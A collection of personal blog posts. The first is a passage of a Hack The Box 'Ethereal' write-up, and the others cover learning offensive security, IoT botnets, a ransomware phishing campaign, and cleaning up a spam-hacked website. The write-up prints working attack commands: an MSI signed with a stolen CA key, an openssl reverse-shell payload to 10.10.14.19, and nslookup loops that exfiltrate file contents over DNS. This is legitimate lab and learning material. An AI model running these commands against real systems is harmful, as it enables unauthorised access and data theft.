HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

…. the file MSIs.link contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there you found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see certificates and and MSIs folder, and conclude you need to sign an MSI.

Signing that darn thing finally :-)

I wanted to re-use the openssl process I tested before. But openssl cannot use PVK files (AFAIK ;-) but you can convert PVK keys to PFX (PKCS#12)

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem

I signed a Code Signing certificate for a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! Imported MyCA.cer to the Trusted Roots and referenced again the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I verified the MSI also with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell, a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin ‘rupal’ will test MSIs frequently. So I need one openssl listener – thus one of the two precious open ports – for waiting for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed it in nslookup. So I used the rce.py to create this type of command (for that it has on option to just display but not run a command), that I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

And rupal called back!

\o/

But he also only half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!

Ethereal-owned

Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling feeds transforms your mind – in a bad way? Solution: Go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

Earlier this year I was investigating the security of some things. They were black-boxes to me, and I figured I need to learn about some offensive tools finally – so I setup a Kali Linux machine. Then I searched for the best way to learn about these tools, I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I saw posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you neto connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I will not pass this entry challenge nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far -to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

Once I had been a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here] every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course, but just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had  long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than the e.g. Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remains to be learned. But on the other hand, I was delighted by how many real-live problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but before you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black-boxes – and sometimes about reverse engineering your predecessors enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zero’s and one’s, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’ back-hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to over-do it. Maybe it’s good to throw in some Cowboy Coding for good measure!

But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are are more Capture-the-Flag-like (CTF) rather than real-world pentesting. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate one one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Internet of Things. Yet Another Gloomy Post.

Technically, I work with Things, as in the Internet of Things.

As outlined in Everything as a Service many formerly ‘dumb’ products – such as heating systems – become part of service offerings. A vital component of the new services is the technical connection of the Thing in your home to that Big Cloud. It seems every energy-related system has got its own Internet Gateway now: Our photovoltaic generator has one, our control unit has one, and the successor of our heat pump would have one, too. If vendors don’t bundle their offerings soon, we’ll end up with substantial electricity costs for powering a lot of separate gateways.

Experts have warned since years that the Internet of Things (IoT) comes with security challenges. Many Things’ owners still keep default or blank passwords, but the most impressive threat is my opinion is not hacking individual systems: Easily hacked things can be hijacked to serve as zombie clients in a botnet and lauch a joint Distributed Denial of Service attack against a single target. Recently the blog of renowned security reporter Brian Krebs has been taken down, most likely as an act of revenge by DDoSers (Crime is now offered as a service as well.). The attack – a tsunami of more than 600 Gbps – was described as one of the largest the internet had seen so far. Hosting provider OVH was subject to a record-breaking Tbps attack – launched via captured … [cue: hacker movie cliché] … cameras and digital video recorders on the internet.

I am about the millionth blogger ‘reporting’ on this, nothing new here. But the social media news about the DDoS attacks collided with another social media micro outrage  in my mind – about seemingly unrelated IT news: HP had to deal with not-so-positive reporting about its latest printer firmware changes and related policies –  when printers started to refuse to work with third-party cartridges. This seems to be a legal issue or has been presented as such, and I am not interested in that aspect here. What I find interesting is the clash of requirements: After the DDoS attacks many commentators said IoT vendors should be held accountable. They should be forced to update their stuff. On the other hand, end users should remain owners of the IT gadgets they have bought, so the vendor has no right to inflict any policies on them and restrict the usage of devices.

I can relate to both arguments. One of my main motivations ‘in renewable energy’ or ‘in home automation’ is to make users powerful and knowledgable owners of their systems. On the other hand I have been ‘in security’ for a long time. And chasing firmware for IoT devices can be tough for end users.

It is a challenge to walk the tightrope really gracefully here: A printer may be traditionally considered an item we own whereas the internet router provided by the telco is theirs. So we can tinker with the printer’s inner workings as much as we want but we must not touch the router and let the telco do their firmware updates. But old-school devices are given more ‘intelligence’ and need to be connected to the internet to provide additional services – like that printer that allows to print from your smartphone easily (Yes, but only if you register it at the printer manufacturer’s website before.). In addition, our home is not really our castle anymore. Our computers aren’t protected by the telco’s router / firmware all the time, but we work in different networks or in public places. All the Things we carry with us, someday smart wearable technology, will check in to different wireless and mobile networks – so their security bugs should better be fixed in time.

If IoT vendors should be held accountable and update their gadgets, they have to be given the option to do so. But if the device’s host tinkers with it, firmware upgrades might stall. In order to protect themselves from legal persecution, vendors need to state in contracts that they are determined to push security updates and you cannot interfere with it. Security can never be enforced by technology only – for a device located at the end user’s premises.

It is horrible scenario – and I am not sure if I refer to hacking or to proliferation of even more bureaucracy and over-regulation which should protect us from hacking but will add more hurdles for would-be start-ups that dare to sell hardware.

Theoretically a vendor should be able to separate the security-relevant features from nice-to-have updates. For example, in a similar way, in smart meters the functions used for metering (subject to metering law) should be separated from ‘features’ – the latter being subject to remote updates while the former must not. Sources told me that this is not an easy thing to achieve, at least not as easy as presented in the meters’ marketing brochure.

Linksys's Iconic Router

That iconic Linksys router – sold since more than 10 years (and a beloved test devices of mine). Still popular because you could use open source firmware. Something that new security policies might seek to prevent.

If hardware security cannot be regulated, there might be more regulation of internet traffic. Internet Service Providers could be held accountable to remove compromised devices from their networks, for example after having noticed the end user several times. Or smaller ISPs might be cut off by upstream providers. Somewhere in the chain of service providers we will have to deal with more monitoring and regulation, and in one way or other the playful days of the earlier internet (romanticized with hindsight, maybe) are over.

When I saw Krebs’ site going offline, I wondered what small business should do in general: His site is now DDoS-protected by Google’s Project Shield, a service offered to independent journalists and activists after his former pro-bono host could not deal with the load without affecting paying clients. So one of the Siren Servers I commented on critically so often came to rescue! A small provider will not be able to deal with such attacks.

WordPress.com should be well-protected, I guess. I wonder if we will all end up hosting our websites at such major providers only, or ‘blog’ directly to Facebook, Google, or LinkedIn (now part of Microsoft) to be safe. I had advised against self-hosting WordPress myself: If you miss security updates you might jeopardize not only your website, but also others using the same shared web host. If you live on a platform like WordPress dot com or Google, you will complain from time to time about limited options or feature updates you don’t like – but you don’t have to care about security. I compare this to avoiding legal issues as an artisan selling hand-made items via Amazon or the like, in contrast to having to update your own shop’s business logic after every change in international tax law.

I have no conclusion to offer. Whenever I read news these days – on technology, energy, IT, anything in between, The Future in general – I feel reminded of this tension: Between being an independent neutral netizen and being plugged in to an inescapable matrix, maybe beneficial but Borg-like nonetheless.

Have I Seen the End of E-Mail?

Not that I desire it, but my recent encounters of ransomware make me wonder.

Some people in say, accounting or HR departments are forced to use e-mail with utmost paranoia. Hackers send alarmingly professional e-mails that look like invoices, job applications, or notifications of postal services. Clicking a link starts the download of malware that will encrypt all your data and ask for ransom.

Theoretically you could still find out if an e-mail was legit by cross-checking with open invoices, job ads, and expected mail. But what if hackers learn about your typical vendors from your business website or if they read your job ads? Then they would send plausible e-mails and might refer to specific codes, like the number of your job ad.

Until recently I figured that only medium or larger companies would be subject to targeted attacks. One major Austrian telco was victim of a Denial of Service attacked and challenged to pay ransom. (They didn’t, and were able to deal with the attack successfully.)

But then I have encountered a new level of ransomware attacks – targeting very small Austrian businesses by sending ‘expected’ job applications via e-mail:

  • The subject line was Job application as [a job that had been advertised weeks ago at a major governmental job service platform]
  • It was written in flawless German, using typical job applicant’s lingo as you learn in trainings.
  • It was addressed to the personal e-mail of the employee dealing with applications, not the public ‘info@’ address of the business
  • There was no attachment – so malware filters could not have found anything suspicious – but only a link to a shared cloud folder (‘…as the attachments are too large…’) – run by a a legit European cloud company.
  • If you clicked the link (which you should not so unless you do this on a separate test-for-malware machine in a separate network) you saw a typical applicant’s photo and a second file – whose name translated to JobApplicationPDF.exe.

Suspicious features:

  • The EXE file should have triggered red lights. But it is not impossible that a job application creates a self-extracting archive, although I would compare that to wrapping your paper application in a box looking like a fake bomb.
  • Google’s Image Search showed that the photo has been stolen from a German photographer’s website – it was an example for a typical job applicant’s photo.
  • Both cloud and mail service used were less known ones. It has been reported that Dropbox had removed suspicious files so it seemed that attackers turned to alternative services. (Both mail and cloud provider reacted quickly and shut down the suspicious accounts)
  • The e-mail did not contain a phone number or street address, just the pointer to the cloud store: Possible but weird as an applicant should be eager to encourage communications via all channels. There might be ‘normal’ issues with accessing a cloud store link (e.g. link falsely blocked by corporate firewall) – so the HR department should be able to call the applicant.
  • Googling the body text of the e-mail gave one result only – a new blog entry of an IT professional quoting it at full length. The subject line was personalized to industry sector and a specific job ad – but the bulk of the text was not.
  • The non-public e-mail address of the HR person was googleable as the job ad plus contact data appeared on a job platform in a different language and country, without the small company’s consent of course. So harvesting both e-mail address and job description automatically.

I also wonder if my Everything as a Service vision will provide a cure: More and more communication has been moved to messaging on social networks anyway – for convenience and avoiding false negative spam detection. E-Mail – powered by old SMTP protocol with tacked on security features, run on decentralized mail servers – is being replaced by messaging happening within a big monolithic block of a system like Facebook messaging. Larger employers already require their applications to submit their CVs using their web platforms, as well as large corporations demand that their suppliers use their billing platform instead of sending invoices per e-mail.

What needs to be avoided is downloading an executable file and executing it in an environment not controlled by security policies. A large cloud provider might have a better chance to enforce security, and viewing or processing an ‘attachment’ could happen in the provider’s environment. As an alternative all ‘our’ devices might be actually be part of a service and controlled more tightly by centrally set policies. Disclaimer: Not sure if I like that.

Iconic computer virus - from my very first small business website in 1997. Image credits mine.

(‘Computer virus’ – from my first website 1997. Credits mine)

 

Shortest Post Ever

… self-indulgent though, but just to add an update on the previous post.

My new personal website is  live:

elkement.subversiv.at

I have already redirected the root URLs of the precursor sites radices.net, subversiv.at and e-stangl.at. Now I am waiting for Google’s final verdict; then I am going to add the rewrite map for the 1:n map of old ASP files and new ‘posts’. This is also the pre-requisite for informing Google about the move officially.

The blog-like structure and standardized attributes like Open Graph meta tags and a XML sitemap should make my site more Google-likeable. With the new site – and one dedicated host name only – I finally added permanent redirects (HTTP 301). Before I used temporary (HTTP 302) redirects, to send requests from the root directory to subfolders, which (so the experts say) is not search-engine-friendly.

On the other hand the .at domain will not help: You can pick a certain country as preferred audience for a non-country domain, but I have to stick with Austria here, even if the language is set to English in all the proper places (I hope).

I have discovered that every WordPress.com Tag or Category has its own feed – just add /feed/ to the respective URLs – and I will make use this in order to automate some of my link curation, like this. This list of physics postings has been created from this feed of selected postings:
https://elkement.wordpress.com/category/science-and-technology/physics/feed/
Of course this means re-tagging and re-categorizing here! Thanks WordPress for the Tags to Categories (and vice versa) Conversion Tools!

It is fun to watch my server’s log files more closely. Otherwise I would have missed that SQL injection attack attempt, trying to put spammy links on my website (into my database):

SQL injection by spammer-hackers

Looking for Patterns

Scott Adams, of Dilbert Fame, has a lot of useful advice in his autobiographical book How to Fail at Almost Everything and Still Win Big. He recommends looking for patterns in your life, without attempting to theorize about cause and effects. Learning from those patterns you could increase the chance that luck with hit you. I believe in increasing your options, so I can relate a lot to applying this approach to Life, the Universe and Everything.

It should be true in relation to the iconic example of patterns, that is: Web traffic. In this post I’ll try to briefly summarize what I have learned so far from most recent unfortunate events (This is PR speak for disaster). I was intrigued by web statistics, web servers’ log files, and the summaries show by the free Google or Bing Webmaster Tools ever since, but I started to follow the trends more closely after my other, non-Wordpress web server had been hacked by the end of November.

How do you recognize that your site has been hacked?

This is very different from what you might expect from popular lore and movies. I downloaded the log files for my web server from time to time, and I just noticed that suddenly the size of the daily files was about twice as usual. Inspecting the IP addresses which the traffic to my site came from I spotted a lot of hits by Google bot. Sites are indexed all the time, but I was baffled by the URLs – all pointing to pages that should not exist on my server. These URLs contained a long query string with all kinds of brand names, as you know them from spam comments or e-mails.

This is an example line in the log file:

Spammy page on hacked web server, accessed by Google botThis IP address belongs to a *.googlebot.com machine, as can be confirmed by resolving the name, e.g. using nslookup. The worrying fact was the status code 200 which means the page had indeed been there.

A few days later this has changed to a 404, so the page did not exist anymore:

Spammy page removed from hacked web server, Google bot tries to access it.The attack had happened in the weekend, and the pages have been removed immediately by my hosting provider.

I cross-checked if those pages had indeed been indexed by Google I searched for site:[domain name]. This is a snippet from the search results – the spammers even borrowed the tag line of our legitimate site as a description (which I cropped from the screenshot here).

spammy-page-in-google-indexOverall these were just a bunch of different pages (ASP files) but Google recognizes every different query string, appended after the question mark, as a different URL. So suddenly Google had a lot more URLs to index and you could see a spike in web master tools:

Crawl stats after hackThere was also a warning message on the welcome page:

Google warning message about 404 errorsWhat to do?

Obviously the first thing is to delete the spammy pages and deal with whatever vulnerability had been exploited. This was done before I noticed the hack myself. But I am still in clean-up mode to get the spammy pages removed from Google’s index:

robots.txt. Using the site:[domain name] search I identified all the spammy pages and added them to the robots.txt file on my server. This file tells search engines which pages not to index. Fortunately you do not have to add each individual URL – adding the page (ending in .asp in this case) is sufficient.

But pages were still in the index after that, just the description was changed to:
A description for this result is not available because of this site’s robots.txt.

As far as I can tell, entries are still added to the index if somebody else links to your pages (actually, spammy pages on other hacked servers, see root cause analysis below). But as Google is not allowed to investigate the target as per robots.txt, it only adds the link without a description.

URL parameters. Since the spammy pages all use query strings and all strings have the same parameter – [page].asp?dca= in my case – I tried managing the URL parameters via web master tools. This is actually an option to let Google know if a query string should really denote another version of a page or if all query strings for one page should be indexed as a single page. E.g. I am using a query string called imgClicked to magnify an image when clicking in the top image, and I could tell Google that the clicked / unclicked image should not be counted as different URLs.

In the special case of the spammy pages I tried to tell Google that different dca values don’t make for a separate page (which would result in about 6 spammy URLs in the index instead of 1500) but this did not impact the gradual accumulation of indexed spammy pages.

Mind-numbing work. To get rid of all pages as fast as possible I also removed each. of. them. manually. via Google master tools. This means:

  • Click on the URL from the search results, opening a new tab. This results in a 404.
  • Copy the URL from the address bar to web master tools in the form for removing the URL.
  • Click submit.
  • Repeat 1500 times.

I am now at about 500. Not all spammy pages that ever existed are displayed at once in the index, but about 10 are added every day. Where do they come from after the original pages had been deleted?

How was this hack actually supposed to work?

The legitimate pages had not been changed or vandalized but the hacker-spammers just placed additional pages on the server. I had never noticed them, had I not encountered Google’s indexing activities.

I was curious how those pages had looked like and I inspected Google’s cache, by searching for cache:[spammy URL]. The cached page consisted of:

  • Your typical junk of spammy text, otherwise I would be delighted about raw material for poetry.
  • A list of links to other spammy pages, most of them on my hacked server
  • An exact copy of the default page of this (legitimate) web site.

I haven’t investigated all those more than 1000 pages and spammy links displayed on them but I conjectured there have to be some outbound links to other – hacked – servers Links will be only boosted if there are backlinks from seemingly independent web sites. Somehow this should make people buy something in a shady webshop at the end of a cascade of links.

After some weeks I was able to confirm this as Google web master tools now show external backlinks to my domain from other spammy pages on legitimate sites, mostly small businesses in the US. Many of them used the same provider that obviously had been hacked as well.

This explains where the gradual supply of spammy links to the index comes from: Google has followed the spammy links from the other hacked servers inbound to my server. It seems to take a while to clean this out as all the other webmasters have removed there pages as well – I checked each. of. them. from the long list supplied by Google as a CSV file.

Hadn’t I been hacked I might have never been aware of the completely unrelated onslaught by Google itself, targeted to this blog. I reported on this in detail previously; here is just an update and a summary.

Edit as from the comments I conclude this was not clear: The following analysis is unrelated to the hack of non-Wordpress site – the hacked site had not been penalized so far by Google. But the blog you are reading right now was.

Symptoms of your site having been penalized by a search engine

Rapid decline of impressions. Webmaster tools show a period of 3 months maximum. I have checked the trend for all my sites now and then, but there was actually never anything that constituted a real trend. But for this blog page impressions went from a few hundred, often more than 1000 per day this summer to less than 10 per day now.

Page impressions Sept to DecPage impressions stayed at their all-time-low since last time, so just extend that graph to the right.

Comparison with sites that should rank much lower. Currently this blog has as much or as few impressions as my personal website e-stangl.at. Its Google pagerank is 1 – as compared to 3 for the WordPress blog; I only update it every quarter at maximum, and its word count is perhaps a thousands of this blog.

My other two sites subversiv.at and radices.net score better although I update them only about once every 6 weeks, and I am pretty sure I violate best practices due to my creative mixing languages, commenting on my own stuff, and/or curating enormous lists of outbound links.

It is ironic that Google has penalized this blog now, as per autumn 2014 my quality control has become more ruthless. I had quite a number of posts in Drafts, with more than 1000 words each, edited, and spell-checked – and finally deleted all of them. The remaining posts were the ones requiring considerable research plus my poetry. This spam poem is one of my most popular posts as by Google’s page impressions. So all theorizing is really futile and I should better watch the pattern emerge.

Identifying offending pages. I added an update to the previous post as I spotted the offending pages using the following method:

  • Identify your top performing pages by ranking pages in the list of search results by impressions or clicks.
  • Then order pages in the list of search results by page name. This is effectively ranking by date for blogs, and the list can be compared to the archive of all pages.
  • Make the time span covered by the Google tools smaller and smaller and check if one your former top pages is suddenly vanishing from the list.

In my case these pages were:

  • A review of a new, a bit unconventional, textbook on quantum field theory and
  • a list of physics books, blogs and websites.

As a reader pointed out correctly this does not mean that the page has been deleted from the index – as you can confirm by searching for site:[Offending URL] explicitly or by adding a more specific search criterion, like adding elkement. I found that the results displayed for my offending pages are erratic: Sometimes, surprisingly, the page will still show up if I just use the title of the post; perhaps a consequence of me, owner of the site, being logged on to Google. Sometimes I need to add an additional keyword to move it to the top in search results again.

But anyway, even if the pages had not been deleted, they had been pushed back to search results page >10.

Something had been deleted from the index though. Here is the number of indexed pages over time, showing a decline starting at the time impressions were plummeting, too:

Pages indexed by Google for this blog as per writing of this postI cannot see a similar effect for any of the other sites, and as far as I know it does not correlate with some Google update (Google has indicated a major update in March 2014 in the figure).

Find the root cause. Except from links on my own sites, and links on other other blogs my blog has no backlinks. As I learned in this research backlinks from forums are often tagged nofollow so that search engines would not consider them spammy. This means links from your avatar commenting on other pages might not boost your blog, but might not hurt either.

The only ‘worthy’ backlink was from the page dedicated to that book I had reviewed – and that page linked exactly to the offending pages. My blog and the author’s page may look to Google as the tangle of cross-linked spammy pages hackers had misused my other web server for.

Do something about it? Conclusion? I replaced some of my links to the author’s site with a link to the book’s page on amazon.com. I moved one of the offending pages, the physics link list, over to radices.net – as I had planned to do so for quite a while in my eternal quest for tidy, consistent web sites. The page is still available on this blog, but not visible in the menu anymore.

But I will not ask the author to remove a valid backlink or remove my innocuous post, it seems like succumbing to the rules of a silly game.

What I learned from this episode is that one single page – perhaps one you don’t even consider important on the grand scale of things and your blog in particular – can boost a blog or drag it down. Which pages are the chosen ones is beyond unpredictable.

Ending on a more positive note I currently encounter the boost effect for your German blog as we indulge in writing about the configuration of this gadget, the programmable control unit we use with our heat pump system. The device is very popular among ambitious DIY enthusiasts, and readers are obviously searching for it.

Programmable control unit

We are often linking to the vendor’s business page and manuals. I hope they will never link back to us.

I will just keep watching the patterns and reporting on my encounters. One of the next enigmas to be resolved: Why is the number of Google searches in my WordPress Stats much higher than the number of page impressions in Google Tools for that day, let alone clicks in Google Tools?

Update 2015-01-23: The answer was embarrassingly simple, and all my paranoia had been misguided. WordPress has migrated their hosted blogs to https only. All my traffic was hiding in the statistics for the https version which has to be added in Google Webmaster Tools as a separate website.

Waging a Battle against Sinister Algorithms

I have felt a disturbance of the force.

As you might expect from a blog about anything, this one has a weird collection of unrelated top pages and posts. My WordPress Blog Stats tell me I am obviously an internet authority on: how rodents get into kitchen appliances, about the physics of a spinning toy, about the history of the first heat pump, and most recently about how to sniff router traffic. But all those posts and topics are eclipsed by the meteoric rise of the single most popular ever article, which was a review of a book on a subfield in theoretical physics. I am not linking this post or quoting its title for reasons you might understand in a minute.

Checking out Google Webmaster Tools the effect is even more pronounced. Some months ago this textbook review attracted by far the most Google search impressions and clicks. Looking at the data from the perspective of a bot it might appear as if my blog had been created just to promote that book. Which is, what I believe might actually had happened.

Concluding from historical versions of the book author’s website (on archive.org), the page impressions of my review started to surge when he put a backlink to my post on his page, some when in spring this year.

But then in autumn this happened.

Page impressions for this blog on Google Webmaster Tools, Sept to Dec.These are the impressions for searches from desktop computers (‘Web’), without image or mobile search. A page impression means that  the link had been displayed on Google Search Results pages to some user. The curve does not change much if I remove the filter for Web.

For this period of three months, that article I Shall Not Quote is the top page in terms of impressions, right after the blog’s default page. I wondered about the reason for this steep decline as I usually don’t see any trend within three months on any of my sites.

If I decrease the time slot to the past month that infamous post suddenly vanishes from the top posts:

Page impressions and top pages in the last monthIt was eradicated quickly – which can only be recognized when decreasing the time slot step-by-step. With a few days at the end of October / beginning of November the entry seems to have been erased from the list of impressions.

I sorted the list of results shown above by the name of the page, not by impressions. Since WordPress posts’ names are prefixed with dates you would expect to see any of your posts in that list somewhere, some of them of course with very slow scores. Actually, that list does include also obscure early posts from 2012 nobody ever clicks at.

The former top post, however, did not get a single impression anymore in the past month. I have highlighted the posts before and after in the list, and I have removed all filters for this one, thus also image and mobile search are taken into account. The post’s name started with /2013/12/22/:

Last month, top pages, recent top post missingChecking the status of indexed pages in total confirms that links have been recently removed:

Index status of this blogFor my other sites and blogs this number is basically constant – as long as a website does not get hacked. As our business site actually has been a month ago. Yes, I only mention this in passing as I am less worried about that hack than about that mysterious penalizing of this blog.

I learned that your typical hack of a website is less spectacular that what hacker movies let you believe: If you are not a high-profile target, hacker-spammers leave your site intact, but place additional spammy pages with cross-links on your site to promote their links. You recognize this immediately by a surge of the number of URLs, of indexing activities, and – in case your hoster is as vigilant as mine – a peak in 404 not found errors after that spammy pages have been removed. This is the intermittent spike in spammy pages on our business page crawled by Google:

Crawl stats after hackI used all tools at my disposal to clean up the mess the hackers caused – those pages actually have been indexed already. It will take a while until things like ‘fake Gucci belts’ will be removed from our top content keywords, after I removed the links from the index by editing robots.txt, and using the Google URL removal tool and the URL parameters tool (the latter comes in handy as the spammy pages have been indexed with various query strings, that is: parameters).

I have expected the worst but Google have not penalized me for that intermittent link spam attack (yet?). Numbers are now back to normal after a peak in queries for those fake brand stuff:

Queries back to normal after clean-up.It was an awful lot of work to clean those URLs popping up again and again every day. I am willing to fight the sinister forces without too much whining. But Google’s harsh treatment of the post on this blog freaks me out. It is not only the blog post that was affected but also the pages for the tags, categories and archive entries. Nearly all of these pages – thus all the pages linking to the post – did not get a single impression anymore.

Google Webmaster Tools also tells me that the number of so-called Structured Data for this blog had been reduced to nearly zero:

Structured data on this blogStructured Data are useful for pages that show e.g. product reviews or recipes – anything that should have a pre-defined structure that might be presented according to that structure in Google search results, via nice formatted snippets. My home-grown websites do not use those, but the spammer-hackers had used such data in their link spam pages – so on our business site we saw a peak in structured data at the time of the hack.

Obviously WP blogs use those per design. Our German blog is based on the same WP theme – but the number of structured data there has been constant. So if anybody out there is using theme Twenty Eleven I would be happy to learn about your encounters with structured data.

I have read a lot: what I never wanted to know about search engine optimization. This also included hackers’ Black SEO. I recommend the book Spam Nation by renowned investigative reporter and IT security insider Brian Krebs, published recently. Whose page and book I will again not link.

What has happened? I can only speculate.

